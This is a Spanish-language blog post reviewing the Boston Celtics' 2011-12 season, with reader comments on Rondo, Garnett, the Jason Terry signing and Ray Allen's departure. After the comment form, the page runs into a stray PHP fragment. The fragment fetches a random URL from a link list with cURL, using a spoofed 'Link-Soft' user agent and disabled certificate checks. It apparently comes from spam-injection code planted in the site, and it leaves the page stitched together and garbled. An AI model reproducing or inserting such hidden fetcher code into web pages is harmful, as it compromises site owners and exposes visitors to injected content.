Boston Celtics: Excelente

07 de July de 2012 por Blade Petrovic

rondooooLa temporada de los Celtics ha sido excelente, sobre todo en Playoffs, donde estuvieron apunto de colarse en las finales. Han tenido unos buenos playoffs, especialmente en las finales de Conferencia. Este año puede haber sido el principio del fin de la era Pierce y el inicio de la era Rondo: ahora Paul debe de dejar un poco de protagonismo al base, ya que Rondo ha cuajado una gran temporada y unos mejores Playoffs liderando al equipo con una gran clase y incluso anotando algún triple. Por lo demás, el Big Three ha respondido como siempre, bien todos en su línea, Garnett dominando por dentro y Allen y Pierce acuchillando desde fuera con su tiro.

Respecto a la regular season, se va notando la edad, el calendario ha sido muy duro y así se puede ver en cómo han quedado en el Este, que cada vez está más complicado. En Playoffs superaron a  los Hawks, sufrieron contra los 76ers y en las finales de conferencia nos brindaron un gran espectáculo. Los Celtics han demostrado que aún les quedan un par de años y que la próxima temporada seguro que darán guerra.

Del resto, hay que destacar a Bass y Bradley, que tienen futuro (no All-Star pero sí como jugadores capaces de aportar). El banquillo, en cambio, ha rendido muy mal, tanto que fue decisivo negativamente en la final de conferencia.

ppkgLo mejor: haber llegado a las finales de conferencia y ponérselo muy difícil a Miami. Rondo dio un paso adelante este año para convertirse en el jugador franquicia.

El Big Three aún puede dar guerra; si no, que se lo pregunten a los Sixers.

Bradley se ha destapado como un jugador muy sólido, excelente defensor y gran finalizador.

Lo peor: el banquillo, que ha dejado muchísimo que desear, y que los años pasan y el próximo puede ser the last train. También el físico se ha notado, sobre todo con los Heat.

Jugando a GM:

– Los Celtics ya han reclutado a Jason Terry, quien se adaptaría perfectamente al rol de sexto hombre que tanto han echado en falta en Boston este año.

– Renovado Garnett, el miembro del Big Three con más papeletas para salir es Allen, quien parece empezar a decantarse por los Heat. Su marcha haría incluso más necesaria la llegada de jugadores sólidos de rotación.

Comenta

13 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    A ver qué rendimiento ofrecen los nuevos rookies Sullinger y Fab Melo. Personalmente, son la pareja de rookies que más me atraen de ver, espero muchas cosas de ellos, y además jugarán desde el principio en un grande. En el resumen yo añadiría tb la plaga de lesiones, desde los problemas cardíacos de Jeff Green hasta las muñecas de Jermaine O’Neal, los tobillos de Ray Allen y las imporantes lesiones tb de Bradley y Wilcox… no sé si me dejo a alguien, pero fijo que sí.

    Ahora toca sustituir a Allen y Ainge debería firmar a OJ Mayo. No pudo hacerse este año, pero ahora ya toca.

      Citar

  2. Sancho88 dice:
    #2

    Ah coño, que ya firmaron a Terry… hostias, estoy tonto.

      Citar

  3. Vader dice:
    #3

    Ojo con la plantilla que tendra Boston. Han perdido a Allen pero suman a Sullinger y Fab Melo, Terry, renuevan a Garnett y Bass, Bradley volverá de su lesión, lo mismo que Green y falta por ver si aún fichan algo más como O.J. Mayo. Un autentico equipazo sobretodo si Pierce y Garnett siguen bien y si Green esta al 100%.

      Citar

  4. rumbero dice:
    #4

    Excelente temporada sin duda. A mitad de RS parecía que tenían poco que decir y nos han acabado regalando algunos de los mejores momentos de toda la temporada: Las exhibiciones de Rondo, la segunda juventud de Garnett (flexiones incluidas), la eliminatoria contra Miami… Creo que han conseguido ganarnos a unos cuantos para la causa céltica después de este año.
    Y el proyecto continua y parece que con buena pinta. Me sobra la pedazo de renovación que le han ofrecido a Green la verdad, pero con la incorporación de los rookies (a los que yo también tengo muchas ganas de ver), la vuelta de lesionados, Terry y algun otro fichaje que pueda caer les veo volviendo a dar guerra.

      Citar

  5. Esteban dice:
    #5

    creo que la campaña de boston es SOBRESALIENTE, ya que este año era hacer lo que se podia con lo que se podia, que no era mucho, la idea de la gerencia de llegar con 20 millones comprometidos a este verano, obligo a fichar juigadoeres que aceptaran un año de contrato y bastante bien les fue

    si vemos que del año pasado a este perdieron a green, kistic, murphy, davis, west, O´neal y llegaron, bass, daniels, pietrus, wilcox y pavlovic, empeoraron el equipo en comparacion y llegaron mas lejos

    mavs hizo una jugada parecida pensando en el espacio salarial y les fue mucho mucho peor, mas como bien dice sancho, con las lesiones que han tenido, incluido un tal ray allen

    bueno sera ahora el rearme, tienen un nucleo joven muy duro, a diferencia de años anteriores, rondo, bradley, green, bass, sullinger y melo, con el respaldo de gente que de ganar sabe como garnett, pierce y terry

    no me parece suficiente como para volver a enfrentarse al heat (a un heat con bosh digo), yo hubiese ido en otras direcciones,

    no hubiese renovado a garnett, por mejor que haya jugado, boston no esta para derrotar a el heat, asi que yo hubiese preferido ahorrarme esos millones en busca de una estrella el año que viene, y lo mismo con terry, hubiese preferido un sexto hombre mas joven, luis williams u oj mayo,
    de esa forma, huebiesen realizado una reconstruccion inmediata, cosa que ahora debera esperar

      Citar

  6. nach dice:
    #6

    Yo creo que le objetivo es la reconstrucción, peor sin perder rendimiento ni competitividad actual, de ahí el que se apueste por la continuidad de Garnett mientras Sullinger y Melo se desarrollan y el fichaje de Terry, que si de algo sabe, es de jugar de 6º hombre, aunque ahora habrá que ver si se queda en el papel de 6º hombre tras Bradley o pasa éste a ser ese 6º hombre. Para mí hasta ahora como aficionado celtic, los moviminetos me están pareciendo buenísimos.

      Citar

  7. jose antonio ramirez dice:
    #7

    Que orgullo ser seguidor de este equipo. Que grande son. Este año equipazo a la vista a pesar de perder a sugar ray. Creo que ainge se lo esta montando bien este año. Falta un escolta para sustituir a allen pero personalmente no me convence oj mayo para celtics y un buen base suplente. Con eso y un poco mas de retoques candidatos. Greenpride donde estas hombre? Vamos a opina de los celtics que hay motivos para la ilusion. Se me olvidaba que estoy con sancho que dijo hace dias que el robodel draft pede ser sullinger. A fab melo n lo he visto jugar
    Y terry me parece muy bueno para los orgullosos.

      Citar

  8. Sempren dice:
    #8

    Rondo-Bradley
    Bradley-Terry
    Pierce-Green
    Bass-Sullinger
    Garnett-Fab Melo

    No me parecen malos mimbres, la verdad, aunque hay varios interrogantes: si Bradley puede ser el jugador de PO, si Green vuelve bien (su renovación hace pensar que sí, pero…), etc.
    En ese caso, incluso creo que todos los jugadores estarían contentos porque se acercarían a los minutos que deberían tener.

    Un base y un pivot decentes, más un alero por si las lesiones, y dependiendo de la calidad de los refuerzos, serán candidatos, aunque dependerá también de los rookies y de Green si realmente se pueden enfrentar a unos Heat que también se refuerzan (les tengo más miedito con el fichaje de Ray Allen).

      Citar

  9. HeiNeKeN dice:
    #9

    La renovación de Jeff Green es de 36 kilos x 4 años al final (4 millones menos de lo que dije xD), y ahora están interesados en Courtney Lee.

    Hinrich vuelve a Chicago 6 millones x 2 años. Ahora quieren intentar un sign and trade con CJ Watson antes del día 11 o sera agente libre.

      Citar

  10. Blade Petrovic dice:
    #10

    me gustaria que dierais vuestra,opinion sobre el post
    gracias

      Citar

  11. simon dice:
    #11

    Blade a mi me ha gustado! directo y conciso destacas lo que hay que destacar y ya está sin irte por las ramas. Me gustaria que con este equipo hubieras jugado mas a GM pero bueno a veces eso tambien es complicado porque a mi me ha pasado en los resumenes que he hecho yo.

      Citar

  12. GreenPride dice:
    #12

    Bueno pues aquí estoy para comentar la temporada de mis queridos verdes.
    En primer lugar decir que me parece casi milgrosa ya que los Celtics se han reinventado a lo largo de esta temporada varias veces y aquí hay que darle una vez más la enhorabuena a Doc Rivers. Empezaron el año contando con Jeff Green como activo importante desde el banco, con Jermaine O’Neal como pivot titular y Chris Wilcox como principal recambio interior. Ninguno de ellos duró mucho por lo que el frontcourt ha tenido que ser totalmente inventado y se las han apañado mejor que bien gracias a un inconmensurable Kevin Garnett. En una jugada maestra Rivers le convenció de que se moviera al puesto de pivot y KG ha respondido jugando su mejor temporada como celtic desde la del título en 2008. Además Pierce y Allen fueron poníendose en forma conforme pasó la temporada y Boston llegó a PO redescubriendo a un jugador muy válido con Avery Bradley que estaba siendo clave en su mejoría. Una vez aquí empezó la época clave de la temporada y los verdes hicieron sentirse orgullosos no ya a sus aficionados sino a todo el mundo del baloncesto con ellos. Con Ray Allen prácticamente cojo y con Bradley jugando lesionado y luego fuera de los PO los Celtics pasaron por encima de los jóvenes Hawks, se deshicieron de los físicos Sixers y maravillaron a todos haciendo un esfuerzo titánico ante los campeones Heat para ponerles las cosas más difíciles de lo que nadie hubiera imaginado ganándoles 3 partidos seguidos y obligando a una actuación para la historia de LeBron en el Garden y a un gran Bosh en el decisivo 7º para poder eliminarles.
    Mención de honor para 2 jugadores en PO: KG ha hecho los mejores PO que yo le haya visto de verde, sí mejores que los del año del título. Jugando de 5 ha maltratado al juego interior de los Hawks y los Sixers y ha dominado al de los Heat hasta el punto de obligarles a arriesgar a Bosh semi-lesionado para poder sacar la eliminatoria adelante. Enorme este jugador y clave su renovación (no hay nadie como él en la NBA actual). Rajon Rondo es el otro gran nombre de estos PO para Boston. El base ha hecho actuaciones antológicas con varios triples-dobles, un partido de 44 puntos contra Miami y enormes dosis de sabiduría baloncestística. En sus manos está el futuro. Ha mejorado su tiro y sólo le falta un poco de confianza en él para ser aún más peligroso y hacer más peligroso el ataque de Boston. Si cuando esté libre lanza y anota con consistencia será un gran paso adelante para todo el ataque celtic. Ha cumplido y se ha ganado su renovación Brandon Bass que ha hecho bueno el trade por “Big Baby” Davis.
    Para el año que viene, esencial la renovación de KG, con él los Celtics volverán a ser aspirantes. El cambio de Allen por Terry está más o menos igualado. Prefiero levemente a Ray pero está más mayor que Terry y en los últimos años bastante tocado por las lesiones. Lo peor es que haya acabado en Miami donde se puede inflar con espacios. Del resto va a ser clave cómo vuelve Jeff Green que debe dar un paso adelante y ser verdaderamente importante en este equipo y queda por ver si los rookies de verdad son buenos como los pintan pues Garnett va a necesitar de ellos en la pintura. Aún confío en que Ainge añada un par de buenos jugadores a la rotación (Courtney Lee, Pietrus y algún interior).
    En cuanto a los que piden que los Celtics se hubieran rejuvenecido y no renovado a Garnett o ido a por otro jugador en vez de Terry, 1) ¿A qué interior disponible se ficha por KG que pueda dar ni la mitad que él? Sinceramente no veo a nadie salvo que des más de medio equipo para traerte a Howard y tampoco porque este no renovaría con unos compañeros mediocres 2) Otro escolta en vez de Terry. ¿quién puede dar ese rendimiento contrastado que da Terry para suplir a Ray? Mayo no se ha visto que lo pueda hacer y no veo nadie capaz de en el mercado con esas características salvo Eric Gordon y no estaba al alcance económico de Boston. Si acaso Jamal Crawford y es un defensor infame y un tirador alocado.
    En definitiva con lo que había en el mercado creo que Boston ha hecho buen trabajo y que con un par de fichajes más y si Green y los rookies rinden los Celtics volverán a estar en la pelea en PO que es de lo que va esto.

      Citar

  13. GreenPride dice:
    #13

    Blade buen análisis, para mi gusto le falta sólo la mención de que se quedaron casi sin juego interior y sin Bradley y con medio Allen por las lesiones (razones principales por las que su banquillo fue tan pobre) y aún así supieron jugar hasta casi meterse en las finales

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>